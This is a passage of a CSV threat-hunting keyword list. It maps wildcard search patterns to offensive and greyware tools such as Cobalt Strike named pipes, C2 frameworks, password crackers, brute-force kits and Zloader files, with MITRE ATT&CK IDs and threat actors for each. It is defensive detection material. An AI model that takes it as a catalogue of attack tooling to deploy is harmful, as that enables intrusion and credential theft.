T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*zha0gongz1/DesertFox*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*Ziconius/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*ziiiiizzzb*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*ziiiiizzzib*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Zloader-FCVP*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5011","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" +"*zoom1.msi.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zoom2.dll.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zsh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1350","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" +"*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*ZXZpZGVuY2UuZmJpLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*zzzteph/weakpass*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*Zzzz Zzzzz Zzzz....*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"./CVE-20* -*","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" +"./radare *","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" +".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"/adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\DserNamePipe*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\f4c3*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\f53f*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\fullduplex_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\interprocess_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\lsarpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\mojo_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\msagent_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\MsFteWds*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that 